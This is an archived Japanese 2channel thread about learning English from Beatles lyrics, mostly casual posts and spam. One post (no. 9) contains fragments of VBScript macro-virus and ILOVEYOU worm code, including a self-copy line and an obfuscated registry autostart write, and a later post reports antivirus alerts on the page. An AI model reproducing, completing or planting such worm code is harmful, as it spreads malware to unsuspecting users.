2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ビートルズで英語のお勉強をしましょう 2時間目

1 :ホワイトアルバムさん:03/05/24 19:34 ID:???
1発目の方がいっぱいになったんで立てました。

前スレ↓
http://music.2ch.net/test/read.cgi/beatles/1003376747/l50

基本的にビートルズの歌詞に関してなら、何でもオッケー。
定期的にあげるのもヨロシク。

2 :ホワイトアルバムさん:03/05/24 19:49 ID:g1W/YrZF
2

3 :ホワイトアルバムさん:03/05/25 14:22 ID:BTquc9Se
前スレでGot to Get You into My Life教えて下さったみなさんありがとう。
神です。

4 :ホワイトアルバムさん:03/05/27 17:10 ID:xiM0QXkx

Love you to は、
結局どうなったんだよ。

日本語に訳すと
どういう意味なの?


5 :ホワイトアルバムさん:03/05/27 17:33 ID:???
何でこのスレこんなに遅いんだ。(w

6 :山崎渉:03/05/28 12:11 ID:???
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉

7 :ホワイトアルバムさん:03/05/28 17:20 ID:VCUG4aYy
     ↑


この山崎渉って何者なの?

どの板見ても出てきて激しくキモい

正体わかる香具師説明してくれよ。

8 :ホワイトアルバムさん:03/05/28 17:42 ID:???
あなたのような反応を期待しているセコイ自己宣伝屋。
いしころと見做して躓かないように気をつけること。

9 :アーカイブ ◆68Hhu.1PqU :03/05/28 18:24 ID:???
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

10 :ホワイトアルバムさん:03/05/30 01:44 ID:U+I5/VT2


スレ立てた人に言いたいんだけど

ここ開くたびにウイルス警告が出るんだよ

ちょっと調べてみた方がいいんでないかな

2 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)